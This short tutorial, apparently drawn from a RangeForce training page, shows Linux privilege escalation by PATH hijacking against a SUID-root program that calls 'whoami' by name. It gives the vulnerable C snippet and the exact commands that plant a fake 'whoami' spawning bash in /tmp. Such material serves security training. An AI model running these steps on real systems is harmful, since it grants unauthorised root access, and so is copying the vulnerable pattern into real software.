
Linux Privilege Escalation Using the SUID Bit

If you have an executable file with the SUID bit set that is owned by root and runs a command as root:

-rwsrwxrwx root root

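Example of a vulnerable program. It calls whoami by name rather than by absolute path, so system() resolves it through the caller's PATH: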

setuid(0);
setgid(0);
system("whoami"); // root, but only because we set UID to 0

Exploitation

Creating a file which spawns a shell when executed:

echo "/bin/bash" > /tmp/whoami

Allowing other users to execute the file:

chmod 777 /tmp/whoami

Adding our malicious program’s directory to the PATH variable so our malicious file gets located first:

export PATH=/tmp:$PATH

If you want to, you can check the contents of the PATH variable like this:

echo $PATH

Now all we have to do is run the vulnerable SUID executable, and we will have root!

./vulnerable-program

Source

[https://materials.rangeforce.com/tutorial/2019/11/07/Linux-PrivEsc-SUID-Bit/](https://materials.rangeforce.com/tutorial/2019/11/07/Linux-PrivEsc-SUID-Bit/){ .md-button }